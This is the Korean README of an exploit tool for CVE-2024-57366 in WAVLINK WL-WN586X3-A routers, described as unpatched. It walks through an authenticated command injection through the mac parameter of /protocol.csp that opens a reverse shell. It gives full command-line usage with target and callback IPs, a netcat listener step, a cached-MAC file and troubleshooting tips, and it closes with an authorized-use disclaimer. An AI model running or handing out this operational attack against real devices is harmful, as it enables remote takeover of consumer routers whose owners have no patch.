
CVE-2024-57366에 대한 WAVLINK WL-WN586X3-A 라우터 제품화 익스플로잇 (이 릴리즈 기준 미패치 상태!)
MAC 주소 검증 우회와 명령어 삽입을 통해 취약한 라우터에서 원격 코드 실행을 가능하게 하는 CVE-2024-57366용 견고한 익스플로잇입니다.
이것은 인증 후(post-authorization) 익스플로잇으로, 라우터의 "Remote Control" 기능이 켜져 있어야 하며 관리자 비밀번호가 필요합니다. 관리자 사용자 이름은 "admin"으로 하드코딩되어 있습니다.
sudo 권한 (네트워크 인터페이스 관리에 필요)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - 대상 라우터 IP 주소 (기본값: 127.0.0.1)--port - 대상 라우터 포트 (기본값: 80)--local-ip - 리버스 셸 콜백을 위한 로컬 IP 주소--local-port - 리버스 셸 콜백용 로컬 포트 (기본값: 4444)--password - 라우터 관리자 비밀번호--ssid - WiFi 네트워크 이름 (기본값: WAVLINK-Mesh_DC4B)--force-full - 전체 익스플로잇 강제 실행, 캐시된 MAC 확인 건너뛰기--list-cached - 캐시된 MAC 주소를 나열하고 종료CVE-2024-57366은 라우터 펌웨어의 MAC 주소 검증 우회를 악용합니다. 이 취약점은 /protocol.csp 엔드포인트의 mac 매개변수를 통한 명령어 삽입을 허용합니다.
eth0 인터페이스 사용index=1, URL 경로의 토큰)익스플로잇은 성공한 MAC 주소를 successful_macs.txt에 자동으로 캐시합니다:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
수동 MAC 추가: successful_macs.txt를 편집하고 다음과 같은 줄을 추가하세요:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Start netcat listener
nc -lvp 4444
# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# When prompted to save MAC address, say "y"
# Start netcat listener
nc -lvp 4444
# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC
"무선 어댑터를 찾을 수 없음"
sudo로 실행해 보세요"MAC 주소 검증 실패"
"요청 시간 초과"
"리버스 셸이 연결되지 않음"
--local-ip가 올바른지 확인하세요 (ip addr show eth0 사용)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다. 소유한 시스템이나 테스트할 명시적 권한이 있는 시스템에서만 사용하세요. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다.
/protocol.csp 엔드포인트를 통한 명령어 삽입이 프로젝트는 교육 목적으로 있는 그대로 제공됩니다. 책임감 있게 그리고 적용 가능한 법률 및 규정에 따라 사용하세요.